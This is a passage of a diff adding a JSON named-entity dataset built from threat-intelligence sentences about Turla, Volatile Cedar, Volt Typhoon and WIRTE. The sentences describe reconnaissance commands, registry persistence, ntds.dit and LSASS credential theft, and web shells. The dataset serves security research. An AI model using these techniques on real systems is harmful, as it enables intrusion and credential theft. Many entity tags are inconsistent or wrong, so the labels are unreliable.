+ "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "PowerShell", + "profiles", + "to", + "maintain", + "persistence", + "on", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "running", + "processes", + "using", + "the", + "<code>tasklist", + "/v</code>", + "command.", + "Turla", + "RPC", + "backdoors", + "have", + "also", + "enumerated", + "processes", + "associated", + "with", + "specific", + "open", + "ports", + "or", + "named", + "pipes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "also", + "used", + "PowerSploit's", + "<code>Invoke-ReflectivePEInjection.ps1</code>", + "to", + "reflectively", + "load", + "a", + "PowerShell", + "payload", + "into", + "a", + "random", + "process", + "on", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "RPC", + "backdoors", + "have", + "included", + "local", + "UPnP", + "RPC", + "proxies." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "IronPython", + "scripts", + "as", + "part", + "of", + "the", + "IronNetInjector", + "toolchain", + "to", + "drop", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "information", + "in", + "the", + "Windows", + "Registry", + "with", + "the", + "<code>reg", + "query</code>", + "command.", + "Turla", + "has", + "also", + "retrieved", + "PowerShell", + "payloads", + "hidden", + "in", + "Registry", + "keys", + "as", + "well", + "as", + "checking", + "keys", + "associated", + "with", + "null", + "session", + "named", + "pipes", + "." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Turla", + "Javascript", + "backdoor", + "added", + "a", + "local_update_check", + "value", + "under", + "the", + "Registry", + "key", + "<code>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "to", + "establish", + "persistence.", + "Additionally,", + "a", + "Turla", + "custom", + "executable", + "containing", + "Metasploit", + "shellcode", + "is", + "saved", + "to", + "the", + "Startup", + "folder", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "remote", + "systems", + "on", + "a", + "local", + "network", + "using", + "the", + "<code>net", + "view</code>", + "and", + "<code>net", + "view", + "/DOMAIN</code>", + "commands.", + "Turla", + "has", + "also", + "used", + "<code>net", + "group", + "\"Domain", + "Computers\"", + "/domain</code>,", + "<code>net", + "group", + "\"Domain", + "Controllers\"", + "/domain</code>,", + "and", + "<code>net", + "group", + "\"Exchange", + "Servers\"", + "/domain</code>", + "to", + "enumerate", + "domain", + "computers,", + "including", + "the", + "organization's", + "DC", + "and", + "Exchange", + "Server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "used", + "<code>net", + "use</code>", + "commands", + "to", + "connect", + "to", + "lateral", + "systems", + "within", + "a", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "obtained", + "information", + "on", + "security", + "software,", + "including", + "security", + "logging", + "information", + "that", + "may", + "indicate", + "whether", + "their", + "malware", + "has", + "been", + "detected." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "compromised", + "servers", + "as", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "attempted", + "to", + "trick", + "targets", + "into", + "clicking", + "on", + "a", + "link", + "featuring", + "a", + "seemingly", + "legitimate", + "domain", + "from", + "Adobe.com", + "to", + "download", + "their", + "malware", + "and", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "operating", + "system", + "configuration", + "details", + "using", + "the", + "<code>systeminfo</code>", + "and", + "<code>set</code>", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "network", + "configuration", + "details", + "using", + "the", + "<code>arp", + "-a</code>,", + "<code>nbtstat", + "-n</code>,", + "<code>net", + "config</code>,", + "<code>ipconfig", + "/all</code>,", + "and", + "<code>route</code>", + "commands,", + "as", + "well", + "as", + "NBTscan.", + "Turla", + "RPC", + "backdoors", + "have", + "also", + "retrieved", + "registered", + "RPC", + "interface", + "information", + "from", + "process", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "active", + "local", + "network", + "connections", + "using", + "the", + "<code>netstat", + "-an</code>,", + "<code>net", + "use</code>,", + "<code>net", + "file</code>,", + "and", + "<code>net", + "session</code>", + "commands.", + "Turla", + "RPC", + "backdoors", + "have", + "also", + "enumerated", + "the", + "IPv4", + "TCP", + "connection", + "table", + "via", + "the", + "<code>GetTcpTable2</code>", + "API", + "call." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "running", + "services", + "and", + "associated", + "processes", + "using", + "the", + "<code>tasklist", + "/svc</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "the", + "system", + "time", + "by", + "using", + "the", + "<code>net", + "time</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "obtained", + "and", + "customized", + "publicly-available", + "tools", + "like", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "the", + "VPS", + "infrastructure", + "of", + "compromised", + "Iranian", + "threat", + "actors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Area", + "I-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "VBS", + "scripts", + "throughout", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "legitimate", + "web", + "services", + "including", + "Pastebin,", + "Dropbox,", + "and", + "GitHub", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "created", + "web", + "accounts", + "including", + "Dropbox", + "and", + "GitHub", + "for", + "C2", + "and", + "document", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "frequently", + "used", + "compromised", + "WordPress", + "sites", + "for", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "RPC", + "backdoors", + "have", + "used", + "cmd.exe", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "gathered", + "credentials", + "from", + "the", + "Windows", + "Credential", + "Manager", + "tool." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "WMI", + "event", + "filters", + "and", + "consumers", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "established", + "persistence", + "by", + "adding", + "a", + "Shell", + "value", + "under", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volatile", + "Cedar", + "has", + "targeted", + "publicly", + "facing", + "web", + "servers,", + "with", + "both", + "automatic", + "and", + "manual", + "vulnerability", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volatile", + "Cedar", + "can", + "deploy", + "additional", + "tools." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volatile", + "Cedar", + "has", + "performed", + "vulnerability", + "scans", + "of", + "the", + "target", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volatile", + "Cedar", + "can", + "inject", + "web", + "shell", + "code", + "into", + "a", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volatile", + "Cedar", + "has", + "used", + "DirBuster", + "and", + "GoBuster", + "to", + "brute", + "force", + "web", + "directories", + "and", + "DNS", + "subdomains." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "archived", + "the", + "ntds.dit", + "database", + "as", + "a", + "multi-volume", + "password-protected", + "archive", + "with", + "7-Zip." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "have", + "inspected", + "server", + "logs", + "to", + "remove", + "their", + "IPs." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "attempted", + "to", + "obtain", + "credentials", + "from", + "OpenSSH,", + "realvnc,", + "and", + "PuTTY." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "staged", + "collected", + "data", + "in", + "password-protected", + "archives." + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "stolen", + "the", + "Active", + "Directory", + "database", + "from", + "targeted", + "environments", + "and", + "used", + "Wevtutil", + "to", + "extract", + "event", + "log", + "information." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "run", + "`net", + "group", + "/dom`", + "and", + "`net", + "group", + "\"Domain", + "Admins\"", + "/dom`", + "in", + "compromised", + "environments", + "for", + "account", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "compromised", + "domain", + "accounts", + "to", + "authenticate", + "to", + "devices", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "run", + "`net", + "group`", + "in", + "compromised", + "environments", + "to", + "discover", + "domain", + "groups." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "gained", + "initial", + "access", + "through", + "exploitation", + "of", + "CVE-2021-40539", + "in", + "internet-facing", + "ManageEngine", + "ADSelfService", + "Plus", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "run", + "`rd", + "/S`", + "to", + "delete", + "their", + "working", + "directories", + "and", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "the", + "built-in", + "netsh", + "`port", + "proxy`", + "command", + "to", + "create", + "proxies", + "on", + "compromised", + "systems", + "to", + "facilitate", + "access." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "attempted", + "to", + "access", + "hashed", + "credentials", + "from", + "the", + "LSASS", + "process", + "memory", + "space." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "copied", + "web", + "shells", + "between", + "servers", + "in", + "targeted", + "environments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "saved", + "stolen", + "files", + "including", + "the", + "ntds.dit", + "database", + "and", + "the", + "`SYSTEM`", + "and", + "`SECURITY`", + "Registry", + "hives", + "locally", + "to", + "the", + "`C:\\Windows\\Temp\\`", + "directory." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "run", + "`net", + "localgroup", + "administrators`", + "in", + "compromised", + "environments", + "to", + "enumerate", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "`wevtutil.exe`", + "and", + "the", + "PowerShell", + "command", + "`Get-EventLog", + "security`", + "to", + "enumerate", + "Windows", + "logs", + "to", + "search", + "for", + "successful", + "logons." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "appended", + "copies", + "of", + "the", + "ntds.dit", + "database", + "with", + "a", + ".gif", + "file", + "extension." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "legitimate", + "looking", + "filenames", + "for", + "compressed", + "copies", + "of", + "the", + "ntds.dit", + "database", + "and", + "used", + "names", + "including", + "cisco_up.exe,", + "cl64.exe,", + "vm3dservice.exe,", + "watchdogd.exe,", + "Win.exe,", + "WmiPreSV.exe,", + "and", + "WmiPrvSE.exe", + "for", + "the", + "Earthworm", + "and", + "Fast", + "Reverse", + "Proxy", + "tools." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "ntds.util", + "to", + "create", + "domain", + "controller", + "installation", + "media", + "containing", + "usernames", + "and", + "password", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "compromised", + "small", + "office", + "and", + "home", + "office", + "(SOHO)", + "network", + "edge", + "devices,", + "many", + "of", + "which", + "were", + "located", + "in", + "the", + "same", + "geographic", + "area", + "as", + "the", + "victim,", + "to", + "proxy", + "network", + "traffic." + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "PowerShell", + "including", + "for", + "remote", + "system", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "enumerated", + "running", + "processes", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "compromised", + "devices", + "and", + "customized", + "versions", + "of", + "open", + "source", + "tools", + "such", + "as", + "Fast", + "Reverse", + "Proxy", + "(FRP),", + "Earthworm,", + "and", + "Impacket", + "to", + "proxy", + "network", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "B-Purp", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "queried", + "the", + "Registry", + "on", + "compromised", + "systems,", + "`reg", + "query", + "hklm\\software\\`,", + "for", + "information", + "on", + "installed", + "software." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "multiple", + "methods,", + "including", + "Ping,", + "to", + "enumerate", + "systems", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "compromised", + "PRTG", + "servers", + "from", + "other", + "organizations", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "queried", + "the", + "Registry", + "on", + "compromised", + "systems", + "for", + "information", + "on", + "installed", + "software." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "a", + "version", + "of", + "the", + "Awen", + "web", + "shell", + "that", + "employed", + "AES", + "encryption", + "and", + "decryption", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "run", + "system", + "checks", + "to", + "determine", + "if", + "they", + "were", + "operating", + "in", + "a", + "virtualized", + "environment." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "discovered", + "file", + "system", + "types,", + "drive", + "names,", + "size,", + "and", + "free", + "space", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "executed", + "multiple", + "commands", + "to", + "enumerate", + "network", + "topology", + "and", + "settings", + "including", + "`ipconfig`,", + "`netsh", + "interface", + "firewall", + "show", + "all`,", + "and", + "`netsh", + "interface", + "portproxy", + "show", + "all`." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "`netstat", + "-ano`", + "on", + "compromised", + "hosts", + "to", + "enumerate", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "executed", + "the", + "PowerShell", + "command", + "`Get-EventLog", + "security", + "-instanceid", + "4624`", + "to", + "identify", + "associated", + "user", + "and", + "computer", + "account", + "names." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "customized", + "versions", + "of", + "open-source", + "tools", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "webshells,", + "including", + "ones", + "named", + "AuditReport.jspx", + "and", + "iisstart.aspx,", + "in", + "compromised", + "environments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "used", + "the", + "Windows", + "command", + "line", + "to", + "perform", + "hands-on-keyboard", + "activities", + "in", + "targeted", + "environments", + "including", + "for", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Volt", + "Typhoon", + "has", + "leveraged", + "WMIC", + "including", + "for", + "execution", + "and", + "remote", + "system", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "used", + "Base64", + "to", + "decode", + "malicious", + "VBS", + "script." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "downloaded", + "PowerShell", + "code", + "from", + "the", + "C2", + "server", + "to", + "be", + "executed." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "attempted", + "to", + "lure", + "users", + "into", + "opening", + "malicious", + "MS", + "Word", + "and", + "Excel", + "files", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Tool", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "named", + "a", + "first", + "stage", + "dropper", + "`Kaspersky", + "Update", + "Agent`", + "in", + "order", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "used", + "HTTPS", + "over", + "ports", + "2083", + "and", + "2087", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + 